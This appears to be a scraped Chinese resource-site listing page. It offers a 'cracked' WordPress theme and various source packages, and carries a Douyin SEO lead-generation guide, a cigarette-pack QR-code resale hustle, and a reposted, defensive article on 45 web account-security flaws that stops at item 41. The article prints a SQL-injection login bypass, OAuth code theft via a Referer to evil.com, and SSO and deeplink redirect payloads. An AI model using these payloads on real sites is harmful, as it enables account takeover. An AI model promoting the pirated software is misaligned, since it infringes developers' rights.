-
一想到要和你分别,就算拨开人群,我也想去见你
-
世界上一切不利状况,都是因为当事人的能力不足。
-
就算天塌下来变成一片废墟,他的脸色也不会有丝毫变化。
况,都是因为当事人的能力不足。
成一片废墟,他的脸色也不会有丝毫变化。
搜索到
2385
篇与
素颜
的结果
-
-
-
wordpress主题JustNews主题V6.01网友分享开心破解版 主题特性响应式设计,完美兼容 PC 端、手机端和平板等各类设备访问模块化随心组合,全新可视化编辑器,自由组合模块做出个性页面强大 SEO 功能,代码级优化,免装 SEO 插件,文章关键词自动内链前端用户中心,自主原创开发的前端用户中心功能,可支持社交登录可视化设置,后台设置选项均有可视化的设置面板,小白也可快速上手手机注册登录,新版本可支持手机注册登录功能,并向下兼容邮箱帐号登录文章专题归类,支持文章专题添加,可灵活展示网站特定类型文章快讯功能,通过快讯功能可实时发布网站或者行业最新新闻动态文章功能扩展,快讯、专题、投稿、版权、打赏、点赞、收藏、手机分享图原创 Themer 框架,为主题提供后台设置面板、可视化工具、基础功能集合隐藏内容,请前往内页查看详情
-
JYmusic跨平台音乐管理系统v2.0版本 JYmusic跨平台音乐管理系统 是一款开源的跨平台音乐管理系统,采用国内最优秀php框架tp5。完全免费,稳定,易于扩展且具有超强大负载能力,完全可以满足音乐、DJ、音乐分享、原创音乐、音乐资讯站等使用终端移动化随着智能手机的普及,移动互联网在互联网当中也占据着半壁江山,我们适应时代的发展, 针对互联网我们开发出三端合一的平台,可轻松自适应PC、平板以及手机端的访问功能插件化减少不必要的负载,自由定制属于自己的音乐程序,在系统的后续服务中,我们能更快对功能进行升级且不改变原有框架需求模块化根据需求开发出所需要的功能模块,让系统在 互联网+ 的时代给您带来更大的商机隐藏内容,请前往内页查看详情
-
-
-
-
-
-
小水滴2.0导航模板,小水滴2.0采用thinkphp+Easy Admin+Mysql 开发 是一套完整的具有商业化的系统 前端简洁,清新,高颜值! 后端便捷,简约,多功能! 配套有会员系统,支付系统,自助广告,插件/模板系统等!第一步:上传源码到服务器,设置php版本 7.4 (需安装sg11扩展)第二步:设置好伪静态,选择thinkphp,然后设置运行目录public第三步:修改/config/database.php这个文件里面的数据库连接信息第四步:导入数据库文件ohymw.sql第五步:后台默认地址/admin第六步:默认账号admin,默认密码123456隐藏内容,请前往内页查看详情
-
Freewind 一一typecho主题自由之风主题最新版 更新介绍对默认编辑器做了增强,freewind主题也有了自己内置的编辑器了,请参考: Freewind主题编辑器展示,在markdown之外做了如下扩展加入了提示组件加入了消息组件加入了Tab分栏组件加入了彩色分割线组件加入了分组卡片组件加入了跳转按钮组件加入了B站视频组件加入了音乐组件加入了SEO优化由于说说图文分离,图片抽离到另外的字段中了,说说有3种模式普通图文(类朋友圈)音乐分享B站视频分享说说图片、评论头像、相册等加入懒加载机制,流量能省一点是一点附件下载样式更换,取消了之前的独立下载页在设置中加入了站点背景设置,大家可以在设置页面看到上次jsDelivr挂了一次,这次加入了自定义CDN的设置,请参考:Freewind设置CDN友情链接样式更改,请参考:我的邻居(PS: 我好像每次更新都要改一次,以后不了)以前文章最下面的版权说明太丑了,这次样式重新设计了一下隐藏内容,请前往内页查看详情
-
通过抖音seo操作知乎推文小说项目精准引流1000粉 下面介绍,我是如何通过抖音 SEO,一个月精准引流 1000 个项目粉,变现 5 万的。1 先上案例我主要是围绕「知乎推文」这个关键词,预设一个搜索场景,粉丝看到别人的爆款视频后,会有什么样的想法,他们会在抖音怎样去搜索。我提前预判他们会想到的问题,搜集整理下来,然后把他们想知道的答案通过作品的形式铺到抖音上,这样他们去搜索相关问题的时候,我提供的答案就会出现在最前面,想了解这个项目的人自然就会私信我了。粉丝经过两道筛选后,非常精准,3 个视频加起来播放量不到 3 万,却给我私域陆续增加了 1000 个精准项目粉,下面是我提炼的 3 个话题——抖音知乎推文怎么赚钱抖音知乎推文怎么对接抖音知乎推文怎么获取授权话题是如何提炼出来的?我在后面总结了详细的一套流程。由于抖音上还没有人去做这块的优化,所以我很容易就把排名做上来了,发布半小时后去搜基本都排在第一,再来个合集就可以稳占第一。所以细分领域很重要,暂时没有竞争,首选自身所在的行业,从最熟悉的领域切入这个赛道。下面是排名做上去后的私信数据,都是想了解推文项目的精准粉,每天陆续 3-50 条私信,精准粉导粉率极高。只要抖音上有推文号热门,就有人想知道这是怎么变现的,有了思考就有了搜索。导流环节也很简单,排名上去后,私信慢慢就来了,准备好两三个话术轮流回复就行,一次回 15 条,回多了信息可能被会抖音吞了。我用的是小号所以不怕封,直接把微信号放到背景图,简单引导,就可以直接上人了。成交环节,前面几天我没想到会有这么多流量过来咨询,每天做售前回复消耗了大量时间。后面跟张柯请教了一下,写了一个项目介绍,通过好友后直接扔介绍就行,大大地提高了效率。公众号真香,随心大哥去年就建议我开始写了,奈何一直写不出来,现在想一想,并不是写不出来,而是钱不够!本身就是精准粉,加上项目介绍一扔,基本没有售前了,看完介绍不打钱的我也不会去多聊了。粉丝是经过筛选的,通过无售前反筛选一次,把粉丝的精准度再提高一波,交付压力再次减少,还是跟随心大哥学的。一个月时间陆续进来 1000 个精准推文粉,转化 10%,变现 5 万,100 个人足够帮我把这个项目拉起来,有点正反馈。我一直有一个在生财分享一篇有用内容的小目标,所以今天我过来了。2 抖音SEO是什么?SEO 俗称搜索流量,参考之前的百度 SEO,百度竞价,这个大家有应该听说过。仔细想想自己平时碰到问题的时候,第一时间会在百度搜索,聊微信的时候在微信搜索,那么刷抖音的时候,是不是会在抖音搜索?回到抖音 SEO。流量在哪里,我们就去哪里,挖掘所需的用户需求,提前布局,坐等粉丝上门,流量是偶然搜索来的,把偶然变成必然就是 SEO 了。来个最直观的案例,两年前的作品,今天依然有新评论,把排名做上去后就会有源源不断的精准客户主动上门找你。3 我是怎么发现这个渠道的这两个月跟张柯一起测试了抖音推文项目,跑通后发现自己私域里积累的人脉并不足以支撑我达到预期,只能想办法去加人了。群里几个小伙伴都跑到知乎去发文引流了,一开始我也想去的,但是我意识一个问题,一起去卷一个渠道肯定不行,粉丝重复,会降低转化率,只能另寻他法。后来有朋友跟我反馈,在百度看到了我们团队的招募广告,我去搜索了一下,发现还真有,问题是我们并没有去做百度排名,没有这一块的经验。搜索了一下「知乎回答为什么能在百度搜索到」才知道,在百度能搜索到是因为知乎在百度有一定的权重。内容在知乎收录了,有一定的机会在百度可以被搜索到,这不就是百度 SEO 了吗?看到百度 SEO,让我想起随心大哥在围观群里分享过的抖音 SEO。我们本身项目重心就在抖音,平时在抖音搜同行,搜对标,都是习惯性行为,为什么就不能在抖音做排名呢?知乎都想到了,最直接的战场却忽略了。我在抖音搜索相关关键词,嘿,一个同行都没有,我意识到这是一个突破口,赶紧把招募文案用图文的形式做了几个简单的图片,通过图文轮播的形式发布到抖音上去。话题直接写「抖音知乎推文怎么赚钱」,这是群友在知乎问答咨询最多的一个话题,直接拿来用,过了半小时,我去搜了一下,居然真的排在第一,有点期待了。隔天早上起来,私信多了十几条咨询,都是直接咨询推文项目的,我意识到这个事肯定能行。由于之前并没有系统地了解这方面的知识,我在微信搜了一下抖音 SEO,找到了几篇分享 SEO 的文章,视频号也找到了大佬的无偿分享。看完分享后,我继续尝试安排了两个长尾话题,没有竞争,很容易就做到了第一,细分领域跟着基础理论去一个个做好细节就足够上排名了。就这样,每天会进来 30 个精准项目粉,只要有同行视频大爆,我的私信就会陆续来人,转化成交,轻松愉快!遇到问题先在(微信,抖音)搜索,把问题具体化,再去解决就容易多了,这个习惯让我在做项目的时候节省很多沟通成本,在这里分享给大家。4 我是如何提炼细分话题的首先,我们要定位自己的精准领域:抖音推文,抖音知乎推文。确定好关键词后,在抖音搜索这个关键词,取得关键线索,再通过关键线索去搜集长尾话题,这里显示出来的都是抖音捕捉的用户搜索行为,有人搜索就有流量。话题线索整理完先在抖音都搜索一遍,往下翻,获取更多用户相关搜索。这就是我们要重点布局的话题(每个话题多搜几次,让系统认为你对这种内容感兴趣)。用小本本把这些相关关键话题整理下来,一个个去搜索,一个个去布局,围绕这些问题去整理答案,发布相应的内容。内容一定是简洁易懂的,用户过来就是为了解决问题,我们要优先解决他们的现有问题,再留个钩子(扔一个问题回去,给个理由让他找我们)。5 抖音SEO应该怎样切入呢?首选自己所在的行业,分析客户用户习惯,了解客户的需求,预判他们在刷抖音的时候会怎么样去搜索,提炼行业关键词。以自己对行业的了解为基础,发散思维,把平时接待客户被问到的问题,整理总结下来,发散思维,代入客户的角色思考,如果是你遇到这种问题你会怎样去搜索?得到相关话题,再通过工具去延伸长尾话题,比如微信指数,巨量算法(在这里搜一下自己行业常用词有惊喜)没有灵感就去抖音搜,这是最直接的方法。整理好行业关键话题,长尾话题,就可以开始在抖音发作品布局答案了,在你的行业,你肯定是最专业的,这就需要你的思考了。6 抖音SEO有什么技巧?图集跟合集是可以增加话题权重的,有时候添加一个合集就可以长期占领第一名。最新发布视频也是一个加分项,每天发布一条作品,添加进合集,可以刷新合集权重。抖音 SEO 玩到最后就是比谁发的答案更多更专业,有了结果请继续铺量去放大。安卓端跟苹果端,普通版跟极速版抖音的排名展现都有区别,这个有需求的朋友可以深入去研究。抖音 SEO 的边际成本很低,一定要多做号,把所有能吃到的搜索流量尽量吃完,多号矩阵,结合同城话题。做不到全国第一,我们就往全城第一努努力,这样一些大的流量词我们也有机会去分一杯羹。借鉴百度SEO,微信SEO,所有行业都值得在抖音重新探索一遍。7 做抖音SEO如何避坑我们先到各大平台搜索 SEO 关键词,可以直接搜到不少干货教程(抖音,知乎,公众号)。自己先去了解 SEO 的基本知识,如果你玩的项目足够细分,通过自己研究、慢慢布局就能做出结果。越细分竞争越小,搜索到的基础理论就够用了,亲测有效。付费玩家不要轻易付费,找熟人推荐,线下有链接的最好,其次是付费社群群主推荐,付费肯定是最快的,专业的事交给专业的人做。保守秘密,小蛋糕只适合独食,多一个人竞争,转化就会差一半,第一名通吃!我做这个测试之前是没有接触过 SEO 的,知其然不知其所以然,可以说是一个纯小白。这个操作,简单,可复制,有结果,希望更多人能够重视抖音 SEO 细分领域的这个流量入口,早日找到属于自己的小蛋糕。
-
烟盒回收项目思维,有人做到月入过万 以前大家对副业没什么需求,认为996的工作制已经让人精疲力竭了,下班后只想把身体交给床,哪还有什么心思和精力去鼓捣副业,但求工作能稳定持续就感天谢地了。但近几年我发现大家对副业的需求越来越强烈了,原因我大致总结了一下1:生存本能的觉醒,几年疫情,酿成了得天独厚的“国难”行情,大家都很难,所有关注点,都凝聚在赚钱养家这件事情上。2:失业率提升,以前用人单位求着应聘者入职,现在用人单位求着入职者辞职,企业利润腰斩甚至亏损,养不活员工只能流入社会。但失业人员的生活还要继续,office迟迟收不到,房贷、车贷、和女朋友下馆子的无奈,甚至KF的钱都没有,倒逼赚钱需求增大。3:以前找工作容易,轻轻松松月入56789k,如果搞个副业意味着还要交学费,还要一门心思去研究,去学习新事物,想想都麻烦,甚至看到个副业广告,立马都会点击屏蔽。但现在不同了,以前是看到美女图片点一点,现在是看到日赚多少元,就会点开,大家的创业心再次被激活了。副业这个词在每一个社交圈子里讨论的频次都很高,我这个公号,除开分享心得之外,也常常会给大家分享项目,之前我写过一篇关于烟头回收的项目,不知道大家还记不记得。不记得话,可以在公号里面搜索关键词“烟头回收”再次查看一下。其实除了烟头回收之外,烟盒也是可以回收的,这目前也是一门生意,做的人还真不多。有人会问:烟盒能有什么价值,难道跟纸盒一样,当废品回收吗?你这么想,那就大错特错,烟盒本身是没什么价值的,真正有价值的是烟盒上的二维码,这个二维码就跟平时我们饮料瓶盖上的二维码类似,扫码可以领取奖励。奖励可能是红包,也有可能是积分,积分能换礼品,还有可能是购物卡,但你想兑换这些是需要门槛的,光靠扫一个烟盒上的二维码是远远不够的,需要大量的二维码才行,因此才衍生出了烟盒回收这个行业。了解完这个项目原理之后,我们就知道回收的其实是二维码,不是烟盒本身,那么这就意味着我们找到回收的商家后,不需要把烟盒邮寄给他,只需要把烟盒上面的二维码整理好,发给他就行。回收商家怎么找,这里提供两个渠道:咸鱼,D音上咸鱼上搜:烟盒回收,你就能找到很多的商家,然后再找一个相对靠谱的商家去跟他联系,他会给你报一个回收的价格和回收的流程,也会告诉你整理二维码的一些细节,回收的价格大致在0.2-0.5元/个。跟你分享这个项目,并不是让你去拾烟盒,而是要学会做一个中间商,赚个差价就行,收集烟盒的事情交给别人。具体可以交给哪些人呢,你看看谁平时最容易接触到烟盒,我想了下,大致是两类人一是环卫工人二是娱乐场所的服务员提前跟他们谈好合作事项,比如价格,流程,多久回收一次,或者多少个回收一次,这样也能减少你的工作量,然后每回收一次,就把二维码收集整理好就行了。至于价格的话,从他们那回收的价格可以定在0.2元,其实绝大多数人都不知道烟盒回收的真正价格,你愿意0.2元去收,他们会很高兴,毕竟做环卫的都是一些上了年纪的人,在工作的同时还能挣点钱,他们是很乐意的。前期去谈好10几个环卫工人或者娱乐场所工作人员,后期定期来收就行了,这一块,目前的竞争并不大,如果是小城市,小县城,可能就你一个人在做,岂不美哉。
-
-
-
-
-
-
WEB开发中常见的45个账号安全风险 以下文章来源于永安在线情报平台 ,作者永安在线 信息化时代,大部分平台都需要通过账号登录才可体验更多功能,近些年为方便用户操作,平台演变出了扫码登录、第三方授权登录等多种登录方式,同时也为攻击者打开了更大的攻击面。 账号包含着各种重要信息如个人手机APP账户、网站账户、银行卡账户密码等,是黑产眼中的“香饽饽”。 永安在线情报平台监测过多起黑产利用账号缺陷发起规模攻击,如扫号攻击、撞库攻击、盗号登录等,最终达到窃取敏感数据、资金盗取、网络诈骗、薅羊毛等目的。因此,加强账号安全管理,是企事业单位业务和数据安全保障的第一道屏障。 为此,猎人君为大家梳理了45个账号安全风险点,方便大家在账号安全管理中查缺补漏,从而建立更加全面的账号安全体系。 下文将结合永安在线情报平台捕获到的攻击案例,对不同安全场景和凭证中45个安全风险逐一分析: 按照不同场景分析 密码登录场景 账号相关 1. 账号可枚举 // 危害性:低 普遍性:高 可利用性:高 通过响应体的内容可以判断账号在系统中是否存在,拿到存在的账户后可进一步发起撞库/爆破攻击,提高攻击效率。 例如该接口会对不存在的用户名返回“用户名不存在”,可利用这个提示来枚举账号。 2. 默认账号 // 危害性:低 普遍性:高 可利用性:高 很多系统都会有默认的账号,比如很多管理后台都会有个admin账号,这样攻击者即使无法枚举账号在系统中是否存在,也可以尝试对默认账号发起攻击。 密码相关 3. 撞库 // 危害性:高 普遍性:中 可利用性:中 一般情况下,用户会用一个手机号或邮箱在多个平台上注册账号,为了方便记忆,密码可能会设置成一样的。当某些平台的用户数据泄露了,攻击者就会拿泄漏的账号密码去别的平台尝试登录。比较常见的有游戏行业的「撞库攻击」,游戏账号的价值比较高,对攻击者来说可获取高额利润。 永安在线情报平台曾捕获过多起黑产贩卖撞库成功得来的账号信息: 4. 钓鱼 // 危害性:高 普遍性:高 可利用性:中 攻击者通过准备一个和官方平台基本一样的登录页面(域名不同)或礼品领取、抽奖的页面等,引诱受害者输入账号密码。攻击者通过这种方式可直接获取到受害者的明文账号密码。 5. 弱密码 // 危害性:高 普遍性:高 可利用性:高 「弱密码」没有一个明确的定义范围,任何可能被猜解出来的密码都可以被称为弱密码。常见的弱密码123456,像dingdang2022、dingdang.com、dingdang@2022也可被称为弱密码。攻击者通过常见的弱密码以及收集目标的相关信息,组合起来生成密码进行爆破。 例如某个管理后台存在弱密码,域名为pass****.cn,通过爆破就得到账号密码为pass****、pass****2016。 6. 万能密码 // 危害性:高 普遍性:低 可利用性:高 「万能密码」指的是用什么密码都可以登录系统,是因为登录接口存在SQL注入漏洞造成的。 例如输入账号admin密码123456,后端会执行的SQL语句大概为: SELECT * FROM user WHERE username='admin' AND password='123456' 如果存在SQL注入漏洞,攻击者可以构造语句,输入账号admin' # ,输入任何密码,后端会执行的SQL语句就变为: SELECT * FROM user WHERE username='admin' #' and password='123456' 这里通过#注释符把后面查询密码的语句注释掉了,校验账号密码的逻辑就失效了,实现万能密码登录。 7. 密码明文传输 // 危害性:高 普遍性:中 可利用性:低 密码在提交到服务器的过程中,没有进行加密处理,攻击者可通过中间人攻击的方式获取到明文密码。 8. 密码在URL中 // 危害性:高 普遍性:低 可利用性:低 如果一个登录请求会把账号密码写在URL中,即把密码暴露在浏览器的地址栏上,或可能会被浏览器、安全软件给记录下来。如果包含密码的这个URL,是个HTML,HTML上又会加载JS、CSS等第三方的资源文件,那在请求这些第三方文件的时候,就会通过Referer把密码泄漏了。 9. 密码明文存储 // 危害性:高 普遍性:低 可利用性:低 用明文存储密码有很大的安全隐患, 一般数据库里还存有用户的姓名、手机号、用户名等信息,一旦数据库发生泄漏,再加上用户的明文密码,攻击者就可以用账号和密码去其他网站尝试登录。因为用户往往会根据习惯将多个网站的密码成一样的,跟前面提到的撞库攻击存在的问题一样。 10. API泄露密码 // 危害性:高 普遍性:低 可利用性:高 因为开发人员的疏忽,API接口可返回用户的所有字段(包括密码)的信息,攻击者就可轻易获取到用户的密码。 验证码相关 11. 图形验证码失效 // 危害性:低 普遍性:低 可利用性:高 常见的让图形验证码失效的方式有把验证码参数值填空,或者验证码参数删掉。 如下案例就是直接把验证码参数删除,验证码失效,不再返回验证码错误。 12. 滑块验证码失效 // 危害性:低 普遍性:低 可利用性:高 最常见的滑块验证码是通过SaaS接入的,但为了避免第三方服务器出问题影响业务的正常运营,通常会提供一个宕机模式(即第三方服务器出问题时可不用进行滑块验证码),攻击者利用这一点就可以让滑块验证码失效。 如下是在请求中添加了个"xx_server_status":0,让服务端以为第三方服务宕机了,就不用进行滑块验证了,从而绕过了滑块验证。 13. 不同端验证码策略不一致 // 危害性:低 普遍性:低 可利用性:高 平台可能对一套系统开发了PC网页版、移动网页版、APP等,在不同端上验证码的策略可能不同。比如在PC网页版的登录接口是有验证码的,换到APP可能就没有验证码了,攻击者就可利用APP的接口来发起攻击。 14. 验证码可复用 // 危害性:低 普遍性:低 可利用性:高 「验证码可复用」即验证码使用多次不失效,利用这个缺陷来绕过验证码发起攻击。 永安在线情报平台就捕获过多起攻击者利用验证码可复用的漏洞进行扫号攻击。如下图,攻击者多次请求都是使用的同一个验证码,并且都请求成功。 15. 使用老接口 // 危害性:低 普遍性:高 可利用性:中 平台开发了新的接口,但是老的接口可能没下线,这类老接口很容易被攻击者利用。 下图是永安在线情报平台捕获的一个攻击事件,平台在页面上显示的是中文验证码: 但从永安在线情报平台流量中看到,攻击者请求中的验证码都是英文数字,并非中文验证码。 通过分析得出应该是平台新接口升级了验证码为中文验证码,但老的接口还能继续使用英文数字验证码,攻击者正是利用这一漏洞对老接口发起攻击。 短信验证码场景 16. 验证码位数过短 // 危害性:高 普遍性:中 可利用性:高 如果短信验证码是纯数字的,位数又比较短(小于等于4位),攻击者很容易把验证码爆破出来。 下图所示是一个短信验证码登录接口,对手机号为13888888888的短信验证码进行爆破,可实现任意用户登录。 17. 验证码有效期过长 // 危害性:中 普遍性:低 可利用性:低 6位纯数字的验证码爆破的成本比较高,一共有一百万个数字需要爆破,耗费的时间会非常长。但如果验证码的有效期比较长,比如1小时甚至更久,还是存在被爆破的风险。 如下案例,某接口登录使用的是6位验证码,有效期超半小时,案例中的验证码是0开头的(运气比较好),所以比较快地爆破出了验证码为064716。 18. 验证码在响应中泄露 // 危害性:高 普遍性:低 可利用性:高 发送短信验证码的接口,有可能在其响应体/响应头中泄漏了验证码。如下案例所示,某教育类APP发送验证码的API接口,在响应体中泄漏了验证码,和客户实际收到的短信验证码一致,攻击者可利用该漏洞实现任意用户登录/注册等操作。 19. 验证码由客户端生成 // 危害性:高 普遍性:低 可利用性:高 在发送短信验证码的接口,也有可能由客户端来生成验证码,然后给到后端来发送短信验证码,相当于可以自己指定手机号的验证码,攻击者可利用该漏洞实现任意用户登录/注册等操作。 20. 测试验证码未删除 // 危害性:高 普遍性:低 可利用性:中 在应用上线前,开发人员可能为了方便测试,设置了测试专用的验证码(如0000、1111、2222等),输入该验证码即可完成登录/注册等操作。在应用上线后可能未删除该验证码,攻击者可利用测试验证码实现任意用户登录/注册等操作。 21. 验证码与手机号未绑定 // 危害性:高 普遍性:低 可利用性:高 在短信验证码登录的场景下,后端校验验证码是否正确时,没有验证验证码与手机号的关系,仅仅校验验证码是否为有效期内下发过的验证码。攻击者可利用自己的手机号接受短信验证码,实现任意用户登录/注册等操作。 扫码登录场景 22. 扫码授权登录CSRF // 危害性:高 普遍性:低 可利用性:中 扫码登录的流程大概如下: 有些后端没有去验证用户是否扫描了这个二维码,可以直接跳到授权登录这一步,在授权登录这个点上如果又存在CSRF漏洞,攻击者即可构造一个恶意的链接,引诱用户打开链接,利用该漏洞就可以轻易获取用户账号权限。 23. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 通过对某个平台的扫码登录逻辑进行分析,猎人君发现最后确认登录时,只需用户的memberId就可以完成登录,每个用户的memberId又是唯一不变的。如果有办法获取到用户的memberId,就相当于永久获取到了其账户的权限。 再进一步挖掘发现在APP内可以使用JavaScript通过JSBridge调用Native方法拿到当前用户的memberId,又通过平时收到的营销短信中的链接发现可以使用Deep Link唤醒APP打开任意URL。 三者结合在一起可构造一个恶意URL,引诱用户打开,打开后会通过Deep Link唤醒APP打开构造好的页面,页面就是通过JavaScript拿到memberId并外传,再拿着memberId通过确认登录的接口就可以登录用户的账号了。 第三方授权登录场景 24. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 第三方授权登录指的是通过QQ、微信或微博等进行登录,如果配置不当也会存在漏洞。 以QQ授权登录举例: https://graph.qq.com/oauth2.0/show?which=Login&display=pc&response_type=code&client_id=123456&redirect_uri=http://www.aaa.com/user/thirdparty/qq_callback.php&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all 用户使用QQ号登录成功后,会把登录凭证code传递给回调地址redirect_uri,如下所示: Location: http://www.aaa.com/user/thirdparty/qq_callback.php&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 那么如果redirect_uri这个值是攻击者可控的,那攻击者可以构造恶意URL来窃取用户的code。正常都会限制redirect_uri的域名,比如为*.aaa.com,这样域名攻击者不可控,就不会有什么问题了。但如果结合其他子域下的问题,还是可能导致用户的code被窃取。 分析某站点第三方登录逻辑时发现,对redirect_uri的域名限制为*.aaa.com,在b.aaa.com域名下发现一个论坛,论坛帖子得回复可以插入第三方的图片,将这两点结合起来就可以通过referer来窃取code。 https://graph.qq.com/oauth2.0/show?which=Login&display=pc&response_type=code&client_id=123456&redirect_uri=http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all 登录成功后会带着code访问帖子: http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 而帖子中又有攻击者插入的第三方图片,在加载第三方图片的时候,就把code传输出去了,完成code窃取: GET http://www.evil.com/test.jpg Referer: http://b.aaa.com/tiezi/123456&state=8ccc0aef42194df06cfd42c606e4d59a&scope=all&code=xxxxxxxxx 攻击者拿到code和state之后,即可登录受害者的账号。 单点登录场景 「单点登录」指的是用户一次可通过一组登录凭证登入会话,在该次会话期间无需再次登录,即可安全访问多个相关的应用程序和服务。 25. 凭证窃取 // 危害性:高 普遍性:低 可利用性:中 如下是某平台单点登录的功能: https://passport.a.com/account/unitivelogin?service=86904ff8&continue=https://www.a.com/account/settoken 在登录状态下访问后会把凭证发送到continue参数指定的地址: 如果continue参数中接口的域名可控,攻击者可把域名改成自己的,再把链接发给受害者,引诱受害者打开链接,凭证就会被发往攻击者的域名。 通过测试发现这里不能将a.com改为b.com,后端有一定的检测逻辑。但通过多次测试发现可以在参数中插入空白字符(%00、%09、%0a、%0d)来干扰检测,达到域名可控的效果。 https://passport.a.com/account/unitivelogin?service=86904ff8&continue=https://www.a.com%09.evil.com/account/settoken 当受害者访问该链接,凭证就会被发送给攻击者了: https://www.a.com.evil.com/account/settoken,攻击者就可以利用该凭证登录其所有业务。 修改密码场景 26. 修改密码CSRF // 危害性:高 普遍性:低 可利用性:中 修改密码处如果没有校验旧密码、短信验证码等,则可能存在CSRF漏洞,易被攻击者利用。攻击者利用该漏洞可构造链接诱导受害者打开,打开后受害者账号的密码就被修改了。 27. 修改密码越权 // 危害性:高 普遍性:低 可利用性:高 修改密码的API存在越权漏洞,导致攻击者可利用该漏洞直接修改其他用户的密码。 忘记密码场景 28. 任意用户密码修改 // 危害性:高 普遍性:低 可利用性:高 忘记密码功能一般会给用户绑定的手机号/邮箱发送一个验证码,验证通过后即可重置密码。攻击者如果可以爆破该验证码,或在最后设置新密码时后端验证存在缺陷,可以导致任意用户密码修改。永安在线情报平台曾捕获到一起攻击事件,攻击者利用某数字藏品的忘记密码接口漏洞,来修改其他用户的密码。 攻击者在修改其他用户的密码后,会登录账号并尝试把账号内的数字藏品进行转增,以此来获利。 账号绑定场景 29. 账号绑定CSRF // 危害性:高 普遍性:低 可利用性:中 平台一般会提供账号绑定的功能,即账号可以绑定邮箱、QQ号或微信号,后续可以使用这些方式进行登录。若绑定功能存在CSRF,攻击者利用该漏洞让受害者绑定上自己的账号(邮箱、QQ号、微信号等),攻击者后续就可以用自己的账号来登录受害者的账号了。 多因子认证场景 许多网站都使用密码一个因子来验证用户的身份,但是有些网站会用多个因子来验证用户的身份。拿密码和验证码两个因子来说,攻击者同时获得这两个因子比获得其中一个因子的可能性要小得多,因此双因子认证比单因子认证更安全。 30. 双因子认证绕过 // 危害性:高 普遍性:低 可利用性:中 如果双因子认证的实现存在缺陷,也是可能被绕过的。 例如,网站验证用户的账号密码后,还要验证邮件收到的验证码,两个因子认证都通过才算登录完成。 但是这里在验证完账号密码后,COOKIE已经拥有了登录态,导致不填入验证码也可以直接访问/my-account账户页面,以此绕过了双因子认证。 31. 双因子认证爆破 // 危害性:高 普遍性:低 可利用性:低 即使网站使用了双因子认证来确保账号安全,但如果没有对爆破攻击进行防御,攻击者还是可以对这些因子(如密码、验证码)进行爆破,以获取账号权限。 按照不同凭证分析 COOKIE 32. COOKIE未设置HTTPONLY // 危害性:低 普遍性:低 可利用性:中 COOKIE如果没有设置HTTPONLY,可能导致COOKIE被窃取。攻击者可以通过XSS漏洞执行document.cookie来拿到用户的COOKIE。 33. COOKIE未设置SECURE // 危害性:低 普遍性:低 可利用性:低 COOKIE如果没有设置SECURE,可能导致COOKIE被窃取。在网站传输使用HTTP的情况下,攻击者可以通过中间人劫持获取到COOKIE。 34. 会话固定 // 危害性:低 普遍性:低 可利用性:中 「会话固定」指的是网站在登录前后的会话不变,比如登录前COOKIE是123456,登录后的COOKIE还是123456,那么攻击者可能就可以通过某些API给受害者写入COOKIE。比如攻击者构造了一个URLhttp://www.a.com/?session=123456,受害者访问后点击该链接进行登录,会话成功建立(此时的session已经被攻击者预先设置为123456了),攻击者此时就可以用session=123456登录受害者的账号了。 35. 不同COOKIE策略不一致 // 危害性:低 普遍性:低 可利用性:低 很多时候网站会给COOKIE设置HTTPONLY以防止XSS漏洞对COOKIE读取,但可能给PC网页版的COOKIE设置了HTTPONLY,但移动端的COOKIE没有设置,攻击者还是可以利用XSS漏洞来获取到用户的COOKIE。 36. API泄露COOKIE // 危害性:高 普遍性:低 可利用性:高 猎人君在分析某站点登录的逻辑时,发现最后会把COOKIE返回在登录成功的API中,这个COOKIE设置了HTTPONLY,正常通过XSS是无法获取到该COOKIE的。但是现在泄漏到了API的响应中,就有机会通过XSS来获取泄漏在登录成功API中的COOKIE。 接下来就需要一个和登录成功页面同域的XSS,登录成功的域是www.a.com,在这个域下的接口很少,想找到一个XSS的难度的比较大。但是在其HTML中发现有这么一段代码document.domain=a.com,将域设置为了a.com,即任意一个子域名*.a.com的XSS都可以获取到该页面的内容,利用难度大幅下降。 37. APP漏洞导致COOKIE被窃取 // 危害性:高 普遍性:低 可利用性:中 比较常见的是因为WEB漏洞导致COOKIE被盗取,但是如果APP中存在漏洞也是可能导致COOKIE被盗取的。 如下案例,首先通过分析JS发现一个可以通过DEEPLINK唤醒APP在WEBVIEW中打开任意URL的漏洞: app://open/?url=http://www.evil.com 在APP中,会用到JsBridge让WebView和Native进行交互,尝试在APP中打开我自己构造的页面,调用Native方法,发现调用失败,猜测是APP中有一定的检测逻辑,导致调用失败,对APP进行逆向分析看是否能够绕过检测。 通过逆向定位到是这里对打开的URL使用了正则进行检测: (^|:\/\/)((((\w|-|\.)+\.)(asdqwe\.(cn|com))))($|[\/\?#]\w* 通过分析发现该正则是可以绕过的,问题出在开头的正则: (^|:\/\/) 那么只要让打开的URL包含如下字符串就能绕过正则的检测: ://aaa.asdqwe.com 也就是如下构造DEEPLINK即可在我的页面中通过JsBridge调用Native方法: app://open/?url=http://www.evil.com/://aaa.asdqwe.com 最后发现调用某个Native方法发起HTTP请求任何域名的URL时,都会带上当前用户的COOKIE,最后利用这个Native方法可以实现盗取COOKIE。 JWT JWT一共分为三段: Header(头部) Payload(负载) Signature(签名) 其中Signature部分是对前两部分的签名,防止数据篡改,按照Header中指定的算法和服务器才知道的密钥来生成。 38. 弱密钥 // 危害性:高 普遍性:中 可利用性:高 JWT的密钥和账号密码一样存在弱密钥的问题,如果密钥非常简单,比如123456,那么攻击者可以非常轻易地生成其他用户的JWT,拿到账户权限。 39. 密钥泄露 // 危害性:高 普遍性:低 可利用性:高 密钥可能通过会代码仓库、报错页面等途径泄漏。 代码仓库泄漏: 报错信息中泄露: 40. 未校验签名 // 危害性:高 普遍性:低 可利用性:高 JWT库通常会提供验证和解码的方法,但是可能开发人员混淆了,只使用了解码方法,没有对签名进行验证,导致可以随意更改JWT来冒充其他用户。 例如,用账户访问/admin api时,返回401,提示该接口只能是administrator访问。 将当前的JWT进行解码,发现在PAYLOAD部分的sub字段存放了用户名。 将用户名更改为administrator,重新生成JWT,不用管签名或者签名部分直接删除,再次访问发现就不会再提示权限不足,成功冒充admin的身份。 41. 空加密算法 // 危害性:高 普遍性:低 可利用性:高 